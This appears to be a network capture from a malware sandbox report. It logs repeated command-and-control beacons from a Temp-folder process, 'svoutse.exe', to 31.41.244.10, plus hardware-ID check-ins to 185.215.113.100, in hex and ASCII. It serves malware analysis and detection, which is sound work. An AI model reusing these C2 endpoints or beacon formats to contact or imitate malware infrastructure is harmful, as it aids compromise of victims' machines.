Sep 6, 2024 09:58:26.511466026 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:26.956727028 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 23:45:15 GMT Content-Type: text/plain Age: 29591 Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:36.966131926 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 09:58:46.975647926 CEST	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49793	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:26.864778042 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:28.186830044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:28.187114954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:28.187537909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:28.189707041 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:28.458302021 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49796	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:28.572026014 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:29.269093990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:29.269999981 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:29.496222019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49797	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:29.617958069 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:30.316425085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:30.317420959 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:30.544703007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49798	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:30.670046091 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:31.391879082 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:31.435869932 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:31.671145916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49799	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:33.074306965 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:33.770903111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:33.771676064 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:34.000081062 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49800	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:34.169579983 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:34.876188040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:34.887460947 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:35.127734900 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.7	49801	185.215.113.100	80

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:35.208547115 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Sep 6, 2024 09:58:35.956075907 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:35 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 6, 2024 09:58:35.958380938 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBK Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 2d 2d 0d 0a Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="hwid"E6126769D7323653143898------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="build"leva------EGHCAKKEGCAAFHJJJDBK--
Sep 6, 2024 09:58:36.213625908 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:36 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49802	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:35.252019882 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:35.947556019 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:35.948371887 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:36.175971985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49803	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:36.296300888 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:37.000190020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:37.003446102 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:37.583199978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 09:58:37.585354090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 6, 2024 09:58:37.787241936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49804	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:37.789264917 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:38.493581057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:38.494590044 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:38.721224070 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.7	49805	185.215.113.100	80

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:38.435874939 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Sep 6, 2024 09:58:39.187503099 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:39 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 6, 2024 09:58:39.194432020 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJDHDGDAAKECAKJDAE Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 45 2d 2d 0d 0a Data Ascii: ------KJJJDHDGDAAKECAKJDAEContent-Disposition: form-data; name="hwid"E6126769D7323653143898------KJJJDHDGDAAKECAKJDAEContent-Disposition: form-data; name="build"leva------KJJJDHDGDAAKECAKJDAE--
Sep 6, 2024 09:58:39.444019079 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:39 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49806	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:38.846527100 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:39.548850060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
